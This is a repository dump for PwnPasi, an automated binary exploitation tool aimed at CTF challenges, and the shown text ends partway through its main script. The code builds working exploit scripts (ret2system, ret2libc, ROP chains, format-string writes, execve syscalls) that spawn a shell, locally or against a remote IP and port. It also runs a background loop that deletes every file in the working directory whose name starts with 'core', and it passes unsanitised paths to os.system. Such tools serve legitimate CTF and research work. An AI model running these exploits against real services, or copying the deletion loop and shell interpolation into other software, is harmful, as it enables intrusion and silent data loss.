[ { "path": "LICENSE", "content": "MIT License\n\nCopyright (c) 2025 Ba1_Ma0\n\nPermission is hereby granted, free of charge, to any person obtaining a copy\nof this software and associated documentation files (the \"Software\"), to deal\nin the Software without restriction, including without limitation the rights\nto use, copy, modify, merge, publish, distribute, sublicense, and/or sell\ncopies of the Software, and to permit persons to whom the Software is\nfurnished to do so, subject to the following conditions:\n\nThe above copyright notice and this permission notice shall be included in all\ncopies or substantial portions of the Software.\n\nTHE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\nIMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\nFITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\nAUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\nLIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\nOUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE\nSOFTWARE.\n" }, { "path": "README.md", "content": "
\n\n# šŸš€ PwnPasi 3.1\n\n**Professional Automated Binary Exploitation Framework**\n\n[![Version](https://img.shields.io/badge/version-3.0-blue.svg)](https://github.com/heimao-box/pwnpasi)\n[![Python](https://img.shields.io/badge/python-3.6+-green.svg)](https://www.python.org/)\n[![License](https://img.shields.io/badge/license-MIT-red.svg)](LICENSE)\n[![Platform](https://img.shields.io/badge/platform-Linux%20%7C%20macOS-lightgrey.svg)](https://github.com/heimao-box/pwnpasi)\n\n\n
\n\n---\n\n## šŸŽÆ What is PwnPasi?\n\nPwnPasi is a **cutting-edge automated binary exploitation framework** designed for CTF competitions and security research, PwnPasi transforms complex binary exploitation into an automated, streamlined process.\n\n### āœØ Key Features\n\nšŸ” **Smart Vulnerability Detection**\n- Automatic stack overflow detection with dynamic padding calculation\n- Format string vulnerability identification and exploitation\n- Binary protection analysis (RELRO, Stack Canary, NX, PIE)\n- Assembly code analysis for vulnerable function detection\n- Automatically generating reports\n\nāš” **Advanced Exploitation Techniques**\n- **ret2system**: Direct system function calls\n- **ret2libc**: ASLR bypass through libc address leaking\n- **ROP Chain Construction**: Automated gadget discovery and chaining\n- **Syscall Exploitation**: execve system call chains\n- **Shellcode Injection**: RWX segment exploitation\n- **Stack Canary Bypass**: Format string canary leaking\n- **PIE Bypass**: Position Independent Executable circumvention\n\nšŸ—ļø **Multi-Architecture Support**\n- **x86 (32-bit)**: Complete 32-bit exploitation chains\n- **x86_64 (64-bit)**: Full 64-bit exploitation support\n- **Auto-detection**: Intelligent architecture recognition\n\nšŸŒ **Flexible Deployment**\n- **Local Mode**: Direct binary file exploitation\n- **Remote Mode**: Network service targeting\n- **Hybrid Approach**: Seamless local-to-remote transition\n\n---\n\n## šŸš€ Quick Start\n\n### Installation\n\n```bash\n# Clone the repository\ngit clone https://github.com/heimao-box/pwnpasi.git\ncd pwnpasi\n\n# Run the automated setup\npython setup.py\n```\n\nThe setup script will automatically:\n- Install system dependencies (Kali/Debian)\n- Set up Python packages (pwntools, LibcSearcher, ropper)\n- Configure the environment\n- Add pwnpasi to system PATH (optional)\n\n### Basic Usage\n\n```bash\n# Analyze local binary\npython pwnpasi.py -l ./target_binary\n\n# Remote exploitation\npython pwnpasi.py -l ./binary -ip 192.168.1.100 -p 9999\n\n# Custom libc and padding\npython pwnpasi.py -l ./binary -libc ./libc-2.19.so -f 112\n```\n\n---\n\n## šŸ’” Usage Examples\n\n### šŸŽŖ Local Binary Analysis\n```bash\n# Comprehensive local analysis\npython pwnpasi.py -l ./vuln_binary\n```\n\n### šŸŒ Remote Service Exploitation\n```bash\n# Target remote CTF service\npython pwnpasi.py -l ./local_binary -ip ctf.example.com -p 31337\n```\n\n### šŸ”§ Advanced Configuration\n```bash\n# Specify custom libc and manual padding\npython pwnpasi.py -l ./binary -libc /lib/x86_64-linux-gnu/libc.so.6 -f 88 -v\n```\n\n---\n\n## šŸ“‹ Command Line Options\n\n| Option | Description | Example |\n|--------|-------------|----------|\n| `-l, --local` | Target binary file (required) | `-l ./vuln_app` |\n| `-ip, --ip` | Remote target IP address | `-ip 192.168.1.100` |\n| `-p, --port` | Remote target port | `-p 9999` |\n| `-libc, --libc` | Custom libc file path | `-libc ./libc-2.27.so` |\n| `-f, --fill` | Manual overflow padding size | `-f 112` |\n| `-v, --verbose` | Enable verbose output | `-v` |\n\n---\n\n## šŸ› ļø Technical Arsenal\n\n### Core Dependencies\n- **pwntools** - The ultimate CTF framework\n- **LibcSearcher** - Libc database and version detection\n- **ropper** - Advanced ROP gadget discovery\n- **checksec** - Binary security feature analysis\n\n### System Tools Integration\n- **objdump** - Assembly analysis and disassembly\n- **strings** - String extraction and analysis\n- **ldd** - Dynamic library dependency mapping\n- **gdb** - Advanced debugging capabilities\n\n---\n\n## šŸŽØ Output Preview\n\n\n\nhttps://github.com/user-attachments/assets/1395d646-eeeb-4342-8b93-e05eed282b92\n\n\n\n---\n\n## šŸ† Why Choose PwnPasi?\n\n### šŸŽÆ **Precision & Automation**\nNo more manual gadget hunting or address calculation. PwnPasi automates the entire exploitation pipeline with surgical precision.\n\n### šŸš€ **Speed & Efficiency**\nFrom vulnerability detection to shell acquisition in seconds, not hours. Perfect for time-critical CTF scenarios.\n\n### šŸ§  **Intelligence & Adaptability**\nSmart fallback mechanisms ensure maximum success rate across different binary configurations and protection schemes.\n\n---\n\n## šŸ¤ Contributing\n\nWe welcome contributions! Whether it's:\n- šŸ› Bug reports and fixes\n- āœØ New exploitation techniques\n- šŸ“š Documentation improvements\n- šŸ”§ Performance optimizations\n\n---\n\n## šŸ“œ License\n\nThis project is licensed under the MIT License - see the [LICENSE](LICENSE) file for details.\n\n---\n\n## āš ļø Disclaimer\n\nPwnPasi is designed for **educational purposes** and **authorized security testing** only. Users are responsible for ensuring compliance with applicable laws and regulations. The developers assume no liability for misuse of this tool.\n\n---\n\n
\n\n**Made with ā¤ļø by Ba1_Ma0**\n\n*Star ā­ this repo if PwnPasi helped you pwn some binaries!*\n\n
\n" }, { "path": "pwnpasi.py", "content": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nfrom pwn import *\nfrom LibcSearcher import *\nimport argparse\nimport sys\nimport os\nimport re\nimport subprocess\nimport time\nimport datetime\nimport threading\nfrom elftools.elf.elffile import ELFFile\nfrom elftools.elf.sections import SymbolTableSection\nfrom docx import Document\nfrom docx.shared import Inches\nfrom docx.enum.text import WD_ALIGN_PARAGRAPH\n\n# Disable core dump files (Unix/Linux only)\ntry:\n import resource\n resource.setrlimit(resource.RLIMIT_CORE, (0, 0))\nexcept:\n pass\n\n# Configure pwntools to prevent core dumps\ncontext.log_level = 'error'\ncontext.terminal = ['bash', '-c']\ntry:\n # Additional core dump prevention\n os.system('ulimit -c 0 2>/dev/null || true')\nexcept:\n pass\n\n# Core file cleanup thread\ndef cleanup_core_files():\n \"\"\"Background thread to continuously remove core files\"\"\"\n while True:\n try:\n # Remove core files in current directory\n os.system('rm -rf core* 2>/dev/null || del core* 2>nul || true')\n time.sleep(1) # Check every second\n except:\n pass\n\n# Start core cleanup thread\ncleanup_thread = threading.Thread(target=cleanup_core_files, daemon=True)\ncleanup_thread.start()\n\n# Global configuration\nVERSION = \"3.1\"\nAUTHOR = \"Security Research Team\"\nGITHUB = \"https://github.com/heimao-box/pwnpasi\"\n\n# Global variables for exploit information\nexploit_info = {\n 'target_binary': '',\n 'exploit_type': '',\n 'payload': '',\n 'padding': 0,\n 'addresses': {},\n 'vulnerability_type': '',\n 'architecture': '',\n 'success': False,\n 'timestamp': ''\n}\n\n# Color schemes (similar to sqlmap)\nclass Colors:\n HEADER = '\\033[95m'\n BLUE = '\\033[94m'\n CYAN = '\\033[96m'\n GREEN = '\\033[92m'\n YELLOW = '\\033[93m'\n RED = '\\033[91m'\n BOLD = '\\033[1m'\n UNDERLINE = '\\033[4m'\n END = '\\033[0m'\n \n # Sqlmap-style colors\n INFO = '\\033[1;34m' # Blue bold\n SUCCESS = '\\033[1;32m' # Green bold\n WARNING = '\\033[1;33m' # Yellow bold\n ERROR = '\\033[1;31m' # Red bold\n CRITICAL = '\\033[1;35m' # Magenta bold\n PAYLOAD = '\\033[1;36m' # Cyan bold\n\ndef print_banner():\n banner = f\"\"\"\n{Colors.BOLD}{Colors.BLUE}\n ____ ____ _ \n | _ \\ __ ___ _| _ \\ __ _ ___(_)\n | |_) |\\ \\ /\\ / / '_ \\ |_) / _` / __| |\n | __/ \\ V V /| | | | __/ (_| \\__ \\ |\n |_| \\_/\\_/ |_| |_|_| \\__,_|___/_|\n{Colors.END}\n{Colors.BOLD} Automated Binary Exploitation Framework v{VERSION}{Colors.END}\n{Colors.CYAN} by {AUTHOR}{Colors.END}\n{Colors.UNDERLINE} {GITHUB}{Colors.END}\n\"\"\"\n print(banner)\n\ndef print_info(message, prefix=\"[*]\"):\n \"\"\"Print info message with sqlmap-style formatting\"\"\"\n timestamp = datetime.datetime.now().strftime(\"%H:%M:%S\")\n print(f\"{Colors.INFO}{prefix}{Colors.END} {Colors.BOLD}[{timestamp}]{Colors.END} {message}\")\n\ndef print_success(message, prefix=\"[+]\"):\n \"\"\"Print success message\"\"\"\n timestamp = datetime.datetime.now().strftime(\"%H:%M:%S\")\n print(f\"{Colors.SUCCESS}{prefix}{Colors.END} {Colors.BOLD}[{timestamp}]{Colors.END} {message}\")\n\ndef print_warning(message, prefix=\"[!]\"):\n \"\"\"Print warning message\"\"\"\n timestamp = datetime.datetime.now().strftime(\"%H:%M:%S\")\n print(f\"{Colors.WARNING}{prefix}{Colors.END} {Colors.BOLD}[{timestamp}]{Colors.END} {message}\")\n\ndef print_error(message, prefix=\"[-]\"):\n \"\"\"Print error message\"\"\"\n timestamp = datetime.datetime.now().strftime(\"%H:%M:%S\")\n print(f\"{Colors.ERROR}{prefix}{Colors.END} {Colors.BOLD}[{timestamp}]{Colors.END} {message}\")\n\ndef print_critical(message, prefix=\"[CRITICAL]\"):\n \"\"\"Print critical message\"\"\"\n timestamp = datetime.datetime.now().strftime(\"%H:%M:%S\")\n print(f\"{Colors.CRITICAL}{prefix}{Colors.END} {Colors.BOLD}[{timestamp}]{Colors.END} {message}\")\n\ndef print_payload(message, prefix=\"[PAYLOAD]\"):\n \"\"\"Print payload information\"\"\"\n timestamp = datetime.datetime.now().strftime(\"%H:%M:%S\")\n print(f\"{Colors.PAYLOAD}{prefix}{Colors.END} {Colors.BOLD}[{timestamp}]{Colors.END} {message}\")\n\ndef print_section_header(title):\n \"\"\"Print section header with decorative lines\"\"\"\n line = \"ā”€\" * 60\n print(f\"\\n{Colors.BOLD}{Colors.BLUE}ā”Œ{line}ā”{Colors.END}\")\n print(f\"{Colors.BOLD}{Colors.BLUE}ā”‚{Colors.END} {Colors.BOLD}{title.center(58)}{Colors.END} {Colors.BOLD}{Colors.BLUE}ā”‚{Colors.END}\")\n print(f\"{Colors.BOLD}{Colors.BLUE}ā””{line}ā”˜{Colors.END}\")\n\ndef print_progress(current, total, task_name):\n \"\"\"Print progress bar similar to sqlmap\"\"\"\n percentage = int((current / total) * 100)\n bar_length = 30\n filled_length = int(bar_length * current // total)\n bar = 'ā–ˆ' * filled_length + 'ā–‘' * (bar_length - filled_length)\n print(f\"\\r{Colors.INFO}[*]{Colors.END} {task_name}: {Colors.CYAN}[{bar}]{Colors.END} {percentage}%\", end='', flush=True)\n if current == total:\n print_info(\"\") # New line when complete\n\ndef print_table_header(headers):\n \"\"\"Print table header\"\"\"\n header_line = \" | \".join([f\"{h:^15}\" for h in headers])\n separator = \"-\" * len(header_line)\n print(f\"{Colors.BOLD}{header_line}{Colors.END}\")\n print(separator)\n\ndef print_table_row(values, colors=None):\n \"\"\"Print table row with optional colors\"\"\"\n if colors is None:\n colors = [Colors.END] * len(values)\n \n formatted_values = []\n for i, (value, color) in enumerate(zip(values, colors)):\n formatted_values.append(f\"{color}{str(value):^15}{Colors.END}\")\n \n row_line = \" | \".join(formatted_values)\n print(row_line)\n\ndef update_exploit_info(key, value):\n \"\"\"Update global exploit information\"\"\"\n global exploit_info\n exploit_info[key] = value\n\ndef generate_exploitation_code():\n \"\"\"Generate complete exploitation code based on exploit type and information\"\"\"\n global exploit_info\n \n # Extract target binary name\n target_name = os.path.basename(exploit_info['target_binary'])\n if target_name.startswith('./'):\n target_name = target_name[2:]\n \n # Base template for exploitation code\n base_code = f\"\"\"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n# PWN Exploitation Script\n# Target: {exploit_info['target_binary']}\n# Exploit Type: {exploit_info['exploit_type']}\n# Architecture: {exploit_info['architecture']}\n# Vulnerability: {exploit_info['vulnerability_type']}\n\nfrom pwn import *\n\n# Target configuration\ntarget = '{target_name}'\ncontext.arch = '{exploit_info['architecture']}'\ncontext.log_level = 'debug'\n\n# Connect to target\nio = process(target)\n# For remote: io = remote('host', port)\n\n\"\"\"\n \n # Add addresses information as variables\n if exploit_info['addresses']:\n base_code += \"# Key addresses\\n\"\n for addr_type, addr_value in exploit_info['addresses'].items():\n if isinstance(addr_value, int):\n base_code += f\"{addr_type} = 0x{addr_value:x}\\n\"\n elif isinstance(addr_value, str) and addr_value.startswith('0x'):\n base_code += f\"{addr_type} = {addr_value}\\n\"\n else:\n try:\n base_code += f\"{addr_type} = 0x{int(str(addr_value)):x}\\n\"\n except:\n base_code += f\"{addr_type} = {repr(addr_value)}\\n\"\n base_code += \"\\n\"\n \n # Add payload construction based on exploit type\n exploit_type = exploit_info['exploit_type'].lower()\n \n if 'ret2system' in exploit_type:\n if 'x64' in exploit_type:\n base_code += f\"\"\"# Construct payload for ret2system x64\npadding = b'A' * {exploit_info['padding']}\npayload = padding\npayload += p64(pop_rdi_addr) # pop rdi; ret\npayload += p64(bin_sh_addr) # \"/bin/sh\" address\npayload += p64(ret_addr) # ret gadget for stack alignment\npayload += p64(system_addr) # system() address\n\"\"\"\n else:\n base_code += f\"\"\"# Construct payload for ret2system x32\npadding = b'A' * {exploit_info['padding']}\npayload = padding\npayload += p32(system_addr) # system() address\npayload += p32(0x0) # return address (dummy)\npayload += p32(bin_sh_addr) # \"/bin/sh\" address\n\"\"\"\n \n elif 'ret2libc' in exploit_type and 'write' in exploit_type:\n if 'x64' in exploit_type:\n base_code += f\"\"\"# Construct payload for ret2libc write x64\npadding = b'A' * {exploit_info['padding']}\npayload = padding\npayload += p64(pop_rdi_addr) # pop rdi; ret\npayload += p64(1) # stdout fd\npayload += p64(pop_rsi_addr) # pop rsi; ret \npayload += p64(write_got) # write@got address\npayload += p64(ret_addr) # ret gadget\npayload += p64(write_plt) # write@plt\npayload += p64(main_addr) # return to main for second stage\n\"\"\"\n else:\n base_code += f\"\"\"# Construct payload for ret2libc write x32\npadding = b'A' * {exploit_info['padding']}\npayload = padding\npayload += p32(write_plt) # write@plt\npayload += p32(main_addr) # return to main\npayload += p32(1) # stdout fd\npayload += p32(write_got) # write@got address\npayload += p32(4) # bytes to write\n\"\"\"\n \n elif 'format string' in exploit_type:\n base_code += f\"\"\"# Format string exploitation\noffset = {exploit_info.get('offset', 'OFFSET_VALUE')}\nbuf_addr = {exploit_info['addresses'].get('buf_addr', 'BUF_ADDRESS')}\nsystem_addr = {exploit_info['addresses'].get('system_addr', 'SYSTEM_ADDRESS')}\n\n# Construct format string payload\npayload = fmtstr_payload(offset, {{buf_addr: system_addr}})\n\"\"\"\n \n elif 'execve syscall' in exploit_type:\n base_code += f\"\"\"# Construct payload for execve syscall\npadding = b'A' * {exploit_info['padding']}\npayload = padding\npayload += p32(pop_eax_addr) # pop eax; ret\npayload += p32(0xb) # execve syscall number\npayload += p32(pop_ebx_addr) # pop ebx; ret\npayload += p32(bin_sh_addr) # \"/bin/sh\" address\npayload += p32(pop_ecx_addr) # pop ecx; ret\npayload += p32(0x0) # argv = NULL\npayload += p32(pop_edx_addr) # pop edx; ret\npayload += p32(0x0) # envp = NULL\npayload += p32(int_0x80) # int 0x80\n\"\"\"\n \n else:\n # Generic payload construction\n base_code += f\"\"\"# Construct payload\npadding = b'A' * {exploit_info['padding']}\npayload = padding\npayload += {repr(exploit_info['payload']) if isinstance(exploit_info['payload'], bytes) else repr(str(exploit_info['payload']))}\n\"\"\"\n \n # Add exploitation execution\n base_code += f\"\"\"\n# Send payload\nio.sendline(payload)\n\n# Get shell\nio.interactive()\n\"\"\"\n \n return base_code\n\ndef generate_docx_report():\n \"\"\"Generate DOCX exploitation report\"\"\"\n global exploit_info\n \n if not exploit_info['success']:\n return\n \n try:\n # Extract target binary name without path and extension\n target_name = os.path.basename(exploit_info['target_binary'])\n if target_name.startswith('./'):\n target_name = target_name[2:]\n target_name = os.path.splitext(target_name)[0]\n \n # Generate report filename\n report_filename = f\"{target_name}_wp.docx\"\n \n # Create document\n doc = Document()\n \n # Add title\n title = doc.add_heading('PWN Exploitation Report', 0)\n title.alignment = WD_ALIGN_PARAGRAPH.CENTER\n \n # Add basic information\n doc.add_heading('Basic Information', level=1)\n basic_info = doc.add_paragraph()\n basic_info.add_run('Target Binary: ').bold = True\n basic_info.add_run(f\"{exploit_info['target_binary']}\\n\")\n basic_info.add_run('Exploitation Time: ').bold = True\n basic_info.add_run(f\"{exploit_info['timestamp']}\\n\")\n basic_info.add_run('Architecture: ').bold = True\n basic_info.add_run(f\"{exploit_info['architecture']}\\n\")\n basic_info.add_run('Vulnerability Type: ').bold = True\n basic_info.add_run(f\"{exploit_info['vulnerability_type']}\\n\")\n basic_info.add_run('Exploitation Method: ').bold = True\n basic_info.add_run(f\"{exploit_info['exploit_type']}\\n\")\n \n # Add padding information\n doc.add_heading('Buffer Overflow Information', level=1)\n padding_info = doc.add_paragraph()\n padding_info.add_run('Buffer Overflow Padding: ').bold = True\n padding_info.add_run(f\"{exploit_info['padding']} bytes\\n\")\n \n # Add addresses information\n if exploit_info['addresses']:\n doc.add_heading('Key Address Information', level=1)\n addr_table = doc.add_table(rows=1, cols=2)\n addr_table.style = 'Table Grid'\n hdr_cells = addr_table.rows[0].cells\n hdr_cells[0].text = 'Address Type'\n hdr_cells[1].text = 'Address Value'\n \n for addr_type, addr_value in exploit_info['addresses'].items():\n row_cells = addr_table.add_row().cells\n row_cells[0].text = addr_type\n # Convert address to hexadecimal format\n if isinstance(addr_value, int):\n row_cells[1].text = f\"0x{addr_value:x}\"\n elif isinstance(addr_value, str) and addr_value.isdigit():\n row_cells[1].text = f\"0x{int(addr_value):x}\"\n elif isinstance(addr_value, str) and addr_value.startswith('0x'):\n row_cells[1].text = addr_value\n else:\n # Try to convert string representation of number to hex\n try:\n if 'x' in str(addr_value):\n row_cells[1].text = str(addr_value)\n else:\n row_cells[1].text = f\"0x{int(str(addr_value)):x}\"\n except:\n row_cells[1].text = str(addr_value)\n \n # Add exploitation code information\n if exploit_info['payload']:\n doc.add_heading('Exploitation Code', level=1)\n payload_para = doc.add_paragraph()\n payload_para.add_run('Complete Python Exploitation Code:\\n').bold = True\n \n # Generate complete exploitation code based on exploit type\n exploitation_code = generate_exploitation_code()\n \n # Add the exploitation code as code block\n payload_para.add_run(f\"{exploitation_code}\\n\")\n \n # Add payload length\n payload_para.add_run('Payload Length: ').bold = True\n if isinstance(exploit_info['payload'], bytes):\n payload_para.add_run(f\"{len(exploit_info['payload'])} bytes\\n\")\n else:\n payload_para.add_run(f\"{len(str(exploit_info['payload']))} characters\\n\")\n \n # Add exploitation summary\n doc.add_heading('Exploitation Summary', level=1)\n summary_para = doc.add_paragraph()\n summary_para.add_run('Exploitation Status: ').bold = True\n summary_para.add_run('Successful\\n')\n summary_para.add_run('Exploitation Method: ').bold = True\n summary_para.add_run(f\"Successfully gained shell access through {exploit_info['vulnerability_type']} vulnerability using {exploit_info['exploit_type']} technique.\\n\")\n \n # Add footer\n doc.add_paragraph('\\n' + 'ā”€' * 50)\n footer_para = doc.add_paragraph()\n footer_para.add_run('Report Generation Tool: ').bold = True\n footer_para.add_run(f\"PwnPasi v{VERSION}\\n\")\n footer_para.add_run('Generation Time: ').bold = True\n footer_para.add_run(f\"{datetime.datetime.now().strftime('%Y-%m-%d %H:%M:%S')}\")\n \n # Save document\n doc.save(report_filename)\n print_success(f\"Exploitation report generated: {Colors.YELLOW}{report_filename}{Colors.END}\")\n \n except Exception as e:\n print_error(f\"Failed to generate report: {e}\")\n\ndef handle_exploitation_success(exploit_type, payload, padding, addresses, vulnerability_type, architecture):\n \"\"\"Handle successful exploitation by updating info and generating report\"\"\"\n update_exploit_info('exploit_type', exploit_type)\n update_exploit_info('payload', payload.hex() if hasattr(payload, 'hex') else str(payload))\n update_exploit_info('padding', padding)\n update_exploit_info('addresses', addresses)\n update_exploit_info('vulnerability_type', vulnerability_type)\n update_exploit_info('architecture', architecture)\n update_exploit_info('success', True)\n \n print_critical(\"EXPLOITATION SUCCESSFUL! Dropping to shell...\")\n \n # Generate DOCX report\n generate_docx_report()\n\ndef set_permission(program):\n \"\"\"Set executable permissions for the program\"\"\"\n try:\n os.system(f\"chmod +755 {program}\")\n return True\n except Exception as e:\n print_error(f\"Failed to set permissions: {e}\")\n return False\n\ndef add_current_directory_prefix(program):\n \"\"\"Add ./ prefix if not present\"\"\"\n if not program.startswith('./'):\n program = os.path.join('.', program)\n return program\n\ndef detect_libc(program):\n \"\"\"Detect libc path automatically\"\"\"\n print_info(\"detecting libc path automatically\")\n libc_path = None\n \n try:\n os.system(f\"ldd {program} | awk '{{$1=$1; print}}' > libc_path.txt\")\n \n with open(\"libc_path.txt\", \"r\") as file:\n for line in file:\n if 'libc.so.6' in line:\n parts = line.split('=>')\n if len(parts) > 1:\n libc_path = parts[1].strip().split()[0]\n print_success(f\"libc path detected: {Colors.YELLOW}{libc_path}{Colors.END}\")\n break\n \n if not libc_path:\n print_warning(\"libc path not found in ldd output\")\n \n except Exception as e:\n print_error(f\"failed to detect libc: {e}\")\n \n return libc_path\n\ndef ldd_libc(program):\n \"\"\"Automatically detect libc path using ldd command\"\"\"\n libc_path = None\n \n try:\n # Use ldd to get library information\n result = subprocess.run(['ldd', program], capture_output=True, text=True)\n if result.returncode == 0:\n for line in result.stdout.split('\\n'):\n if 'libc.so.6' in line:\n parts = line.split('=>')\n if len(parts) > 1:\n libc_path = parts[1].strip().split()[0]\n print_info(f\"automatically detected libc: {Colors.YELLOW}{libc_path}{Colors.END}\")\n break\n \n if not libc_path:\n print_warning(\"libc path not found automatically\")\n \n except Exception as e:\n print_error(f\"failed to detect libc: {e}\")\n \n return libc_path\n\ndef Information_Collection(program):\n \"\"\"Collect binary information using checksec\"\"\"\n try:\n # Run checksec command\n result = subprocess.run(['checksec', program], capture_output=True, text=True)\n content = result.stdout\n \n info_dict = {}\n \n # Parse architecture\n arch_match = re.search(r\"Arch:\\s+(\\S+)\", content)\n if arch_match:\n arch = arch_match.group(1)\n if '64' in arch:\n info_dict['bit'] = 64\n bit = 64\n elif '32' in arch:\n info_dict['bit'] = 32\n bit = 32\n \n # Parse security features\n keys = ['RELRO', 'Stack', 'NX', 'PIE', 'Stripped', 'RWX']\n for key in keys:\n if key in content:\n for line in content.split('\\n'):\n if key in line and ':' in line:\n info_dict[key] = line.split(\":\")[1].strip()\n break\n \n # Determine stack protection\n stack = 0\n if 'Stack' in info_dict:\n if info_dict['Stack'] == 'No canary found':\n stack = 0\n elif info_dict['Stack'] == 'Canary found':\n stack = 1\n elif info_dict['Stack'] == 'Executable':\n stack = 2\n \n # Determine RWX segments\n rwx = 0\n if 'RWX' in info_dict:\n if info_dict['RWX'] == 'Has RWX segments':\n rwx = 1\n \n # Determine PIE\n pie = None\n if 'PIE' in info_dict:\n if info_dict['PIE'] == 'PIE enabled':\n pie = 1\n \n # Display information\n for key, value in info_dict.items():\n print_info(f\"{key}: {Colors.YELLOW}{value}{Colors.END}\")\n \n return stack, rwx, bit, pie\n \n except Exception as e:\n print_error(f\"failed to collect binary information: {e}\")\n return 0, 0, 32, None\n\ndef collect_binary_info(program):\n \"\"\"Collect comprehensive binary information\"\"\"\n print_info(\"collecting binary information\")\n \n try:\n os.system(f\"checksec {program} > Information_Collection.txt 2>&1\")\n \n with open(\"Information_Collection.txt\", 'r') as f:\n content = f.readlines()\n \n result = {}\n \n # Parse architecture\n arch_match = re.search(r\"Arch:\\s+(\\S+)\", \"\".join(content))\n if arch_match:\n arch = arch_match.group(1)\n result['arch'] = arch\n if '64' in arch:\n result['bit'] = 64\n elif '32' in arch:\n result['bit'] = 32\n \n # Parse security features\n security_features = ['RELRO', 'Stack', 'NX', 'PIE', 'Stripped', 'RWX']\n for feature in security_features:\n for line in content:\n if feature in line:\n result[feature] = line.split(\":\")[1].strip()\n break\n \n # Process stack canary\n stack_protection = 0\n if 'Stack' in result:\n if result['Stack'] == 'No canary found':\n stack_protection = 0\n elif result['Stack'] == 'Canary found':\n stack_protection = 1\n \n # Process RWX segments\n rwx_segments = 0\n if 'RWX' in result:\n if result['RWX'] == 'Has RWX segments':\n rwx_segments = 1\n \n # Process PIE\n pie_enabled = 0\n if 'PIE' in result:\n if result['PIE'] == 'PIE enabled':\n pie_enabled = 1\n \n return result, stack_protection, rwx_segments, result.get('bit', 64), pie_enabled\n \n except Exception as e:\n print_error(f\"failed to collect binary information: {e}\")\n return {}, 0, 0, 64, 0\n\ndef display_binary_info(info_dict):\n \"\"\"Display binary information in a professional table format\"\"\"\n print_section_header(\"BINARY SECURITY ANALYSIS\")\n \n # Create table for security features\n headers = [\"Feature\", \"Status\", \"Risk Level\"]\n print_table_header(headers)\n \n risk_colors = {\n \"HIGH\": Colors.ERROR,\n \"MEDIUM\": Colors.WARNING, \n \"LOW\": Colors.SUCCESS,\n \"INFO\": Colors.INFO\n }\n \n security_analysis = {\n \"RELRO\": (\"MEDIUM\" if \"Partial\" in info_dict.get(\"RELRO\", \"\") else \"LOW\", info_dict.get(\"RELRO\", \"Unknown\")),\n \"Stack Canary\": (\"HIGH\" if \"No canary\" in info_dict.get(\"Stack\", \"\") else \"LOW\", info_dict.get(\"Stack\", \"Unknown\")),\n \"NX Bit\": (\"HIGH\" if \"disabled\" in info_dict.get(\"NX\", \"\") else \"LOW\", info_dict.get(\"NX\", \"Unknown\")),\n \"PIE\": (\"MEDIUM\" if \"No PIE\" in info_dict.get(\"PIE\", \"\") else \"LOW\", info_dict.get(\"PIE\", \"Unknown\")),\n \"RWX Segments\": (\"HIGH\" if \"Has RWX\" in info_dict.get(\"RWX\", \"\") else \"LOW\", info_dict.get(\"RWX\", \"Unknown\"))\n }\n \n for feature, (risk, status) in security_analysis.items():\n colors = [Colors.END, Colors.END, risk_colors.get(risk, Colors.END)]\n print_table_row([feature, status, risk], colors)\n \n print()\n\ndef find_large_bss_symbols(program):\n \"\"\"Find large BSS symbols suitable for shellcode storage\"\"\"\n print_info(\"searching for shellcode storage locations\")\n \n try:\n with open(program, 'rb') as f:\n elf = ELFFile(f)\n symtab = elf.get_section_by_name('.symtab')\n \n if not symtab:\n print_warning(\"no symbol table found\")\n return 0, None, None\n \n for symbol in symtab.iter_symbols():\n if (symbol['st_info'].type == 'STT_OBJECT' and symbol['st_size'] > 30):\n print_success(f\"shellcode storage found: {Colors.YELLOW}{symbol.name}{Colors.END} at {Colors.YELLOW}{hex(symbol['st_value'])}{Colors.END}\")\n return 1, hex(symbol['st_value']), symbol.name\n \n print_warning(\"no suitable shellcode storage locations found\")\n return 0, None, None\n \n except Exception as e:\n print_error(f\"failed to analyze symbols: {e}\")\n return 0, None, None\n\ndef scan_plt_functions(program):\n \"\"\"Scan and analyze PLT functions\"\"\"\n print_info(\"analyzing PLT table and available functions\")\n \n try:\n os.system(f\"objdump -d {program} > Objdump_Scan.txt 2>&1\")\n target_functions = [\"write\", \"puts\", \"printf\", \"main\", \"system\", \"backdoor\", \"callsystem\"]\n function_addresses = {}\n found_functions = []\n \n with open(\"Objdump_Scan.txt\", \"r\") as file:\n lines = file.readlines()\n \n print_section_header(\"FUNCTION ANALYSIS\")\n headers = [\"Function\", \"Address\", \"Available\"]\n print_table_header(headers)\n \n for func in target_functions:\n found = False\n address = \"N/A\"\n \n for line in lines:\n if f\"<{func}@plt>:\" in line or f\"<{func}>:\" in line:\n address = line.split()[0].strip(\":\")\n function_addresses[func] = address\n found_functions.append(func)\n found = True\n break\n \n status = \"YES\" if found else \"NO\"\n color = Colors.SUCCESS if found else Colors.ERROR\n colors = [Colors.END, Colors.YELLOW if found else Colors.END, color]\n print_table_row([func, address, status], colors)\n \n print_info(\"\")\n return function_addresses\n \n except Exception as e:\n print_error(f\"failed to scan PLT functions: {e}\")\n return {}\n\ndef set_function_flags(function_addresses):\n \"\"\"Set function availability flags\"\"\"\n target_functions = [\"write\", \"puts\", \"printf\", \"main\", \"system\", \"backdoor\", \"callsystem\"]\n function_flags = {func: (1 if func in function_addresses else 0) for func in target_functions}\n return function_flags\n\ndef find_rop_gadgets_x64(program):\n \"\"\"Find ROP gadgets for x64 architecture\"\"\"\n print_info(\"searching for ROP gadgets (x64)\")\n \n gadgets = {\n 'pop_rdi': None,\n 'pop_rsi': None, \n 'ret': None,\n 'other_rdi_registers': None,\n 'other_rsi_registers': None\n }\n \n try:\n # Search for pop rdi gadgets\n os.system(f\"ropper --file {program} --search 'pop rdi' > ropper.txt --nocolor 2>&1\")\n os.system(f\"ropper --file {program} --search 'pop rsi' >> ropper.txt --nocolor 2>&1\")\n os.system(f\"ropper --file {program} --search 'ret' >> ropper.txt --nocolor 2>&1\")\n \n with open(\"ropper.txt\", \"r\") as file:\n lines = file.readlines()\n \n print_section_header(\"ROP GADGETS (x64)\")\n headers = [\"Gadget Type\", \"Address\", \"Instruction\"]\n print_table_header(headers)\n \n 